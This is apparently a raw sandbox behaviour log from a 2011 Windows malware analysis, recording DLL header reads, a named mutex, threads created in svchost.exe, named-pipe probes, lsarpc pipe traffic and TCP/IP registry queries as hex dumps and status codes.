File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 2078169723
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 2078170608
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: A10000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2078171487
System info queried Type: BasicInformation success or wait 2078172315
System info queried Type: ProcessorInformation success or wait 2078172618
System info queried Type: BasicInformation success or wait 2078174608
System info queried Type: ProcessorInformation success or wait 2078174904
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078175363
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2078176499
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2078177470
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 2078177786
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 2078178664
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: A10000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2078179544
System info queried Type: BasicInformation success or wait 2078180370
System info queried Type: ProcessorInformation success or wait 2078180672
System info queried Type: BasicInformation success or wait 2078183354
System info queried Type: ProcessorInformation success or wait 2078183649
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078184060
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2078185195
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2078186211
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 2078186528
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 2078187406
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: A10000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2078188285
System info queried Type: BasicInformation success or wait 2078189113
System info queried Type: ProcessorInformation success or wait 2078189414
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2078191540
Thread created PID: 1100 TID: 1984 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2078193078
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2078194768
Thread delayed Time: 0 TID: 4392 success or wait 2079045332
Thread delayed Time: 0 TID: 4392 success or wait 2079045840
Thread delayed Time: 0 TID: 4392 success or wait 2079046337
Thread delayed Time: 0 TID: 4392 success or wait 2080166726
Thread delayed Time: 0 TID: 4392 success or wait 2080167230
Thread delayed Time: 0 TID: 4392 success or wait 2080167713
Thread delayed Time: 0 TID: 4392 success or wait 2081291670
Thread delayed Time: 0 TID: 4392 success or wait 2081292076
Thread delayed Time: 0 TID: 4392 success or wait 2081292494
Thread delayed Time: 0 TID: 4392 success or wait 2082401152
Thread delayed Time: 0 TID: 4392 success or wait 2082401658
Thread delayed Time: 0 TID: 4392 success or wait 2082402154
Thread delayed Time: 0 TID: 4392 success or wait 2083519747
Thread delayed Time: 0 TID: 4392 success or wait 2083520251
Thread delayed Time: 0 TID: 4392 success or wait 2083520738
Thread delayed Time: 0 TID: 4392 success or wait 2084638083
Thread delayed Time: 0 TID: 4392 success or wait 2084638599
Thread delayed Time: 0 TID: 4392 success or wait 2084639097
Thread delayed Time: 0 TID: 4392 success or wait 2085756655
Thread delayed Time: 0 TID: 4392 success or wait 2085757185
Thread delayed Time: 0 TID: 4392 success or wait 2085757674
Thread delayed Time: 0 TID: 4392 success or wait 2086875583
Thread delayed Time: 0 TID: 4392 success or wait 2086876088
Thread delayed Time: 0 TID: 4392 success or wait 2086876594
Thread delayed Time: 0 TID: 4392 success or wait 2087994173
Thread delayed Time: 0 TID: 4392 success or wait 2087994690
Thread delayed Time: 0 TID: 4392 success or wait 2087995194
Thread delayed Time: 0 TID: 4392 success or wait 2089112795
Thread delayed Time: 0 TID: 4392 success or wait 2089113309
Thread delayed Time: 0 TID: 4392 success or wait 2089113802
Thread delayed Time: 0 TID: 4392 success or wait 2090231403
Thread delayed Time: 0 TID: 4392 success or wait 2090231910
Thread delayed Time: 0 TID: 4392 success or wait 2090232406
Thread delayed Time: 0 TID: 4392 success or wait 2091350795
Thread delayed Time: 0 TID: 4392 success or wait 2091351312
Thread delayed Time: 0 TID: 4392 success or wait 2091351816
Thread delayed Time: 0 TID: 4392 success or wait 2092468579
Thread delayed Time: 0 TID: 4392 success or wait 2092469110
Thread delayed Time: 0 TID: 4392 success or wait 2092469597
Thread delayed Time: 0 TID: 4392 success or wait 2093587239
Thread delayed Time: 0 TID: 4392 success or wait 2093587763
Thread delayed Time: 0 TID: 4392 success or wait 2093588266
Thread delayed Time: 0 TID: 4392 success or wait 2094705854
Thread delayed Time: 0 TID: 4392 success or wait 2094706368
Thread delayed Time: 0 TID: 4392 success or wait 2094706861
Thread delayed Time: 0 TID: 4392 success or wait 2095827722
Thread delayed Time: 0 TID: 4392 success or wait 2095828236
Thread created PID: 1100 TID: 2644 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2185819659
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2185831867
Thread created PID: 1100 TID: 3168 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2293048823
Thread created PID: 1100 TID: 3156 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2294165676
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2294167595
+ Sections
+ General
Start time: 05:48:10
Start date: 01/12/2011
Path: C:\WINDOWS\system32\VBoxService.exe
Commandline: system32\VBoxService.exe
Imagebase:
File size: 1048880 bytes
MD5 hash: 99788E7204B94353FC7C06C5EB252EF1
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
\pipe\lsarpc read attributes and synchronize and generic read and generic write non directory file false success or wait 11 77E84B2A
\Device\Tcp6 generic execute no options false object name not found 55 76D6271D
\Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} read data or list directory and write data or add file and synchronize no options true success or wait 11 76D636DA
\Device\Afd\Endpoint synchronize and generic read and generic write synchronous io non alert true success or wait 11 71AB40EB
\Device\Tcp synchronize and generic execute synchronous io non alert true success or wait 11 71A92FB8
+ File written
File Path Offset Length Value Completion Count Source Address
\lsarpc 0 72 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 11 77E8081B
+ File read
File Path Offset Length Value Completion Count Source Address
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 B3 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 52 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 B5 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 52 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 BA 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 FB 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 FC 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 FE 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 09 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 05 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 46 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 4A 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 4B 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
\lsarpc 0 1024 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 90 25 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 1 77E84F31
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 40 00 00 00 01 00 00 00 28 00 00 00 00 00 2C 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 0C 00 00 00 02 00 01 00 00 08 00 00 ........@.......(.....,......................................... pending 11 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 8C CF B7 70 78 03 DD 4B AA F9 70 A9 01 58 CA 27 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9........px..K..p..X.'.................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 8C CF B7 70 78 03 DD 4B AA F9 70 A9 01 58 CA 27 ........,......................px..K..p..X.' pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 C3 86 E7 21 03 51 1F 40 B4 5C 5F 2E 5A 37 BA 49 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9........!.Q.@.\_.Z7.I.................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 C3 86 E7 21 03 51 1F 40 B4 5C 5F 2E 5A 37 BA 49 ........,......................!.Q.@.\_.Z7.I pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 8A 0B B1 2E BB 0B 50 44 9E 5B F7 AD 85 13 4E 58 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9...........PD.[....NX.................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 8A 0B B1 2E BB 0B 50 44 9E 5B F7 AD 85 13 4E 58 ........,.........................PD.[....NX pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 C2 53 85 65 8C 23 BF 45 A9 FB EC E0 DC 7B F1 F4 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9......S.e.#.E.....{...................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 C2 53 85 65 8C 23 BF 45 A9 FB EC E0 DC 7B F1 F4 ........,....................S.e.#.E.....{.. pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 89 0E E5 5B B6 76 D9 4C B2 29 E8 EB A4 7D 72 FC 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9........[.v.L.)...}r..................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 89 0E E5 5B B6 76 D9 4C B2 29 E8 EB A4 7D 72 FC ........,......................[.v.L.)...}r. pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 01 A5 50 8A 2F 8E 7D 4F A4 5D A0 51 0D 20 D3 D2 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9.......P./.}O.].Q. ...................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 01 A5 50 8A 2F 8E 7D 4F A4 5D A0 51 0D 20 D3 D2 ........,.....................P./.}O.].Q. .. pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 52 B2 13 57 E8 75 4E 4E 80 22 E4 39 85 18 5C 47 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9.....R..W.uNN.".9..\G.................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 52 B2 13 57 E8 75 4E 4E 80 22 E4 39 85 18 5C 47 ........,...................R..W.uNN.".9..\G pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 3E F4 C5 9A E2 7B 4F 4A BF 83 AE 46 5A 18 28 DD 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9.....>....{OJ...FZ.(..................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 3E F4 C5 9A E2 7B 4F 4A BF 83 AE 46 5A 18 28 DD ........,...................>....{OJ...FZ.(. pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 B0 75 F0 E4 25 5A B2 45 BB 5C 29 7C 0C 26 2A 06 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9......u..%Z.E.\)|.&*..................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 B0 75 F0 E4 25 5A B2 45 BB 5C 29 7C 0C 26 2A 06 ........,....................u..%Z.E.\)|.&*. pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 FA A9 15 E8 2C 0F AA 4F 96 EA 0F E1 81 7E 5E A2 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9.........,..O.....~^..................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 FA A9 15 E8 2C 0F AA 4F 96 EA 0F E1 81 7E 5E A2 ........,.......................,..O.....~^. pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 31 72 9E CE B9 01 51 4A A2 6E F0 4F F7 CA 1D 4A 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9.....1r....QJ.n.O...J.................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 31 72 9E CE B9 01 51 4A A2 6E F0 4F F7 CA 1D 4A ........,...................1r....QJ.n.O...J pending 1 77E81068
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Bind buffer overflow 22 77DD708B
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Bind success or wait 11 77DD708B
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
